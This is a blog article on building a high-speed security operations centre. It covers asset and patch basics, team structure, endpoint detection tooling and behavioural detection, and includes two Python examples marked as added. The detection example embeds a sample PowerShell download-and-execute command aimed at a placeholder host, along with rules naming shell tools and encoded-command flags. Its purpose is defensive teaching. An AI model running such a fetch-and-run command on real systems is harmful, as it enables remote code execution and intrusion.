Rick McElroy, 30 April 2018

Building a High-Speed Security Operations Centre (SOC)

As a Security Strategist, I am aware that when an incident occurs, the speed of your response will dictate the extent to which you can minimise the impact. Every second counts, and while the clock is ticking, the cost of the breach is rapidly increasing.

Breaches that take more than 30 days to contain cost companies roughly $1 million more than those contained sooner, and depending on the severity the difference can be larger still. Minimising dwell time is the name of the game: the faster you can identify the root cause, the faster you can remediate. So how can you transform your security operations centre (SOC) into an intelligence-driven operation that hunts for threats before they show up as known indicators? Here I will cover mastering the security basics, organising your team effectively, streamlining detection and response with technology, and evolving your SOC with each new attack.

A highly efficient SOC lets its defenders combine automation with human judgement. A high-speed SOC must excel in several areas of security operations so that no time is handed to the adversary, and the ability to run an agile, intelligence-driven SOC depends on how your organisation answers the following four questions:

What Are The Basics We Need To Master First?

Speed can only be built on a strong security foundation. A process can only be automated once your team understands it well enough to specify it exactly; automating a process your team does not fully understand creates blind spots and is likely to reduce visibility as you scale. Before handing security-critical processes to machines, make sure you know the weaknesses of your current posture:

  1. Have you minimised your attack surface?
  2. Have you inventoried every asset?
  3. Are your systems being properly patched?
  4. How would you know if they were not?

Organisations must master these basics and achieve speed, but must also strive for complete visibility across the environment and continuous monitoring of every event. The fourth question is the real test: an unmonitored gap in patching or inventory is invisible to you until an attacker finds it.
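As an added example that is not part of the original article, the following Python gives concrete answers to questions 2 to 4 by reconciling a CMDB export against endpoint telemetry and a patch baseline: hosts that appear on the network but not in the inventory, inventory hosts that send no telemetry at all, hosts whose telemetry is stale, and hosts below the required patch level. The host names, the three data sets and the numeric-field version comparison are constructed assumptions for illustration; in practice the inputs would come from your CMDB, your EDR or agent console, and your vulnerability-management feed.

```python
"""Reconcile what we think we own (CMDB) against what telemetry actually
reports, and check each reporting host against a patch baseline.

Added example, not from the original article. INVENTORY, OBSERVED and
BASELINE are constructed sample data; version_key() is a simple numeric-field
compare that suits kernel/build strings like the ones below (an assumption).
"""
import re
from datetime import datetime, timedelta

NOW = datetime.fromisoformat("2018-04-30T12:00:00")  # constructed "current time"

INVENTORY = {  # host -> owner: what the CMDB says we own (constructed)
    "web-01": "platform",
    "web-02": "platform",
    "db-01": "data",
    "hr-laptop-17": "hr",
}

OBSERVED = [  # what agents / scans actually reported (constructed)
    {"host": "web-01", "os": "ubuntu", "last_seen": "2018-04-29T09:12:00",
     "packages": {"kernel": "4.15.0-20"}},
    {"host": "web-02", "os": "ubuntu", "last_seen": "2018-04-02T22:40:00",
     "packages": {"kernel": "4.15.0-13"}},
    {"host": "hr-laptop-17", "os": "windows", "last_seen": "2018-04-30T08:05:00",
     "packages": {"build": "16299.309"}},
    {"host": "dev-box-9", "os": "ubuntu", "last_seen": "2018-04-30T10:00:00",
     "packages": {"kernel": "4.15.0-20"}},  # never entered in the CMDB
]

BASELINE = {  # os -> package -> minimum acceptable version (constructed)
    "ubuntu": {"kernel": "4.15.0-20"},
    "windows": {"build": "16299.371"},
}


def version_key(version):
    """Compare versions on their numeric fields: '4.15.0-20' -> (4, 15, 0, 20)."""
    return tuple(int(n) for n in re.findall(r"\d+", version))


def reconcile(inventory, observed, baseline, now, max_silence=timedelta(days=7)):
    """Return the four kinds of gap a SOC needs to know about.

    unknown   - reporting hosts that are not in the inventory (question 2)
    silent    - inventory hosts with no telemetry at all (question 4)
    stale     - reporting hosts not heard from within max_silence (question 4)
    unpatched - (host, package, installed, required) below baseline (question 3)
    """
    seen = {r["host"]: r for r in observed}
    findings = {
        "unknown": sorted(h for h in seen if h not in inventory),
        "silent": sorted(h for h in inventory if h not in seen),
        "stale": [],
        "unpatched": [],
    }
    for host in sorted(seen):
        rec = seen[host]
        if now - datetime.fromisoformat(rec["last_seen"]) > max_silence:
            # Flagged separately: its patch data below is only as fresh as last_seen.
            findings["stale"].append(host)
        # An OS with no baseline entry gets no checks; decide deliberately
        # whether that should itself be a finding in your environment.
        for pkg, required in baseline.get(rec["os"], {}).items():
            installed = rec["packages"].get(pkg)
            if installed is None or version_key(installed) < version_key(required):
                findings["unpatched"].append((host, pkg, installed, required))
    return findings


if __name__ == "__main__":
    for kind, items in reconcile(INVENTORY, OBSERVED, BASELINE, NOW).items():
        print(f"{kind:10s} {items}")
```

Every list this returns is a host you cannot currently say is patched: the unknown and silent ones because nothing is checking them, the stale ones because the last answer is weeks old. Those are the blind spots to close before automating anything on top of this data.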

How Can I Efficiently Organise And Lead The People On My Team?

Organising a team to protect the environment with agility is difficult given the varied skills a SOC needs and the constraints of traditional SOC structures. Efficiency starts with breaking those structures down and moving beyond an operation that focuses solely on event analysis. Red Canary, for example, has innovated within its security team and around the investigation process: its intel team takes part in engineering efforts, its engineers take part in analysis, and so on. Rather than assigning each team member a label to focus on exclusively, each person has a core ‘practice’. They still develop and improve within that practice, but they are also expected to engage with the other functions in the SOC.

How Can Technology Help Streamline Our Detection and Response Processes?

Technology can help you hunt proactively for threats across the enterprise, drill down rapidly to the root cause of an incident, and ultimately reduce dwell time. Security professionals use tools such as Carbon Black’s Cb Response to validate hunting hypotheses and to turn a confirmed hypothesis into an automated watchlist that raises a custom alert whenever the suspicious pattern recurs.

Malicious attacks can take over nine months on average to identify at the root and contain. Cb Response lets analysts visualise the complete attack kill chain and respond within minutes, without manually aggregating and sifting the relevant raw data after the fact. It also lets you isolate an infected host from the network while retaining a secure direct connection to that endpoint, so the investigation can continue on the isolated machine rather than stopping the moment it is cut off.

How Can My Entire SOC Evolve With Every New Attack?

In Verizon’s Data Breach Investigations Report, 88% of breaches fell into one of nine patterns that had already been identified three years earlier. Attackers know that legacy antivirus can be bypassed by making slight changes to a sample so that it is no longer recognised as “known bad”; a behavioural pattern of attack is much harder to dodge that way. By using those patterns to connect the dots between IOCs and the surrounding system events, SOC analysts and incident responders can reconstruct the precise sequence of events as an intrusion unfolds.

That gives clear cause-and-effect insight into where the attacker gained access, what they tried to accomplish, how they attempted exfiltration and, ultimately, what the root cause of the attack was. Without that context, an incident responder has no basis for saying how the organisation could be better protected next time.
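As an added example (not code from the original article, and not Cb Response’s own query language or API), the following Python puts the two ideas above together: a watchlist of behavioural rules, written as plain predicates, is run over process-start events, and for every alert the parent chain is walked back to the root so the analyst sees the whole sequence rather than one IOC. The events, rule names, host process names and the encoded PowerShell command are constructed for the example; the rule for encoded commands is one example pattern, not a complete detection.

```python
"""Watchlist-style detection over endpoint process events, with each
alerting process traced back to its root so the whole chain is visible.

Added example, not from the original article or from Carbon Black. The
rules are plain Python predicates (not any product's query syntax), and
the process events and encoded command are constructed sample data.
"""
import base64
import re

# Constructed: the command a malicious macro might launch, and its
# -EncodedCommand form (PowerShell expects base64 of the UTF-16LE script).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed process-start events; ppid links each process to its parent.
EVENTS = [
    {"pid": 100, "ppid": 1,   "name": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "name": "outlook.exe",  "cmdline": "OUTLOOK.EXE"},
    {"pid": 300, "ppid": 200, "name": "winword.exe",  "cmdline": "WINWORD.EXE /n invoice.docm"},
    {"pid": 400, "ppid": 300, "name": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"pid": 600, "ppid": 100, "name": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},  # benign admin script
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# -e, -ec, -enc and -encodedcommand are all accepted prefixes of -EncodedCommand.
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def office_spawns_shell(event, parent):
    """Pattern of attack, not a hash: an Office app starting a shell/script host."""
    return (parent is not None and parent["name"].lower() in OFFICE_APPS
            and event["name"].lower() in SHELLS)


def encoded_powershell(event, parent):
    """PowerShell launched with an encoded command line."""
    return event["name"].lower() == "powershell.exe" and ENC_RE.search(event["cmdline"]) is not None


# Rule order is the order in which alerts are reported for a single event.
WATCHLIST = [
    ("office_spawns_shell", office_spawns_shell),
    ("encoded_powershell", encoded_powershell),
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def root_cause_chain(by_pid, pid):
    """Walk ppid links from pid back to the earliest process on record,
    returning process names root-first. The visited set guards against
    recycled PIDs producing a loop."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["name"])
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def match_watchlist(events):
    """Run every rule over every event; each alert carries its full chain."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        for rule_name, rule in WATCHLIST:
            if rule(e, parent):
                alerts.append({
                    "rule": rule_name,
                    "pid": e["pid"],
                    "chain": root_cause_chain(by_pid, e["pid"]),
                    "decoded": decode_encoded_command(e["cmdline"]),
                })
    return alerts


if __name__ == "__main__":
    for a in match_watchlist(EVENTS):
        print(a["rule"], a["pid"], " -> ".join(a["chain"]))
        if a["decoded"]:
            print("   decoded:", a["decoded"])
```

The benign backup script launched from explorer.exe fires nothing, while the encoded PowerShell does, and its chain (explorer.exe to outlook.exe to winword.exe to powershell.exe) is the cause-and-effect story the text describes: mail client, weaponised document, download cradle. Decoding the command line is what turns the alert from "suspicious" into "downloads a second stage from this URL", which is the detail the next watchlist rule gets built from.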

Overall, a high-speed SOC lets your organisation stop addressing the same threats over and over: more time hunting new threats, less time manually policing known areas of risk. The future SOC is not a technology, per se; it is people, intelligence and automation combined to allow a rapid response to a threat.
